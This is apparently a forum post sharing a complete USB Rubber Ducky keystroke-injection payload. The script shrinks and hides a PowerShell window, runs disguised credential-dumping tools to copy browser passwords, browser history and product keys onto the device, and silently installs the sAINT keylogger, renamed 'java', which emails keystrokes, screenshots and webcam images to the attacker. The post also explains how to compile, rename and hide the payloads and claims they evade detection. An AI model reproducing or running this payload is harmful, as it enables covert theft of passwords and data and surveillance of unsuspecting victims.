W1L5T3R

yes, you need to take out the SD card to replace payload otherwise you run the execution on yourself. and yes you can use twin firmware to add PDF or whatever (hide the payload files etc via windows settings on the USB .. hide files so none show up EXCEPT the PDF)

Standing on the shoulders of giants on this one :) shout out to them This will do the following: 1. Move the powershell dialogue (small size) to the bottom of the screen 2. steal all browser passwords and dump them onto the rubber ducky 3. steal all browser history and dump them onto the rubber ducky 4. steal product keys and dump them onto the rubber ducky (everything installed which needs a product key it will dump) 5. silently install sAINT and then dump keystrokes, screenshot and webcam snap to your email (disguised as java and not detected) All of this from plugging in the rubber duck to removing is within 10 seconds. I just adjusted the coding a little and got it running quickly and silently. to make sAINT work - use a linux machine (kali or parrot or whatever) and download sAINT and compile the .exe... rename the .exe to whatever you like and store on the rubber ducky. download browser history, browser password viewer and product key viewer from here: https://www.nirsoft.net/ rename them to whatever you like and use encoder to make the inject.bin here is a copy of the script: DELAY 300 REM CLOSES ALL WINDOWS THAT ARE OPEN GUI d DELAY 200 REM OPEN RUN BOX GUI r DELAY 100 REM OPENS POWERSHELL STRING powershell.exe DELAY 100 ENTER DELAY 100 REM CHANGES TERMINAL TO SMALL BOX STRING MODE CON:COLS=18 LINES=1 DELAY 100 ENTER DELAY 100 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM SETS THE PATH FOR THE USB DRIVE AND CHANGES LABEL TO _ (underscore) STRING $usbPath = GET-WMIObject Win32_Volume | ? { $_.label -eq '_' } | select name ENTER DELAY 100 REM CD INTO USB DRIVE STRING cd $usbPath.name ENTER REM RUNS BROWSER PASS STEALER SILENTLY AND STORES TEXT FILE ON USB STRING ./WinUpdate1 /stext win1log.txt <<<<<<renamed to WinUpdate1>>>>>> DELAY 100 ENTER REM RUNS BROWSER HISTORY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE STRING ./WinUpdate2 /stext win2log.txt <<<<<<<renamed to WinUpdate2>>>>> DELAY 100 ENTER REM RUNS PRODUCT KEY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE STRING ./PKV /stext pkvlog.txt <<<<<<renamed to PKV>>>>>> DELAY 100 ENTER DELAY 200 REM RUNS SAINT LOGGER SILENTLY AND REPORTS TO YOUR EMAIL SCREENSHOT AND KEYSTROKES PLUS WEBCAM SNAP STRING ./java <<<<<I renamed the sAint.exe to java>>>>> DELAY 100 ENTER STRING exit ENTER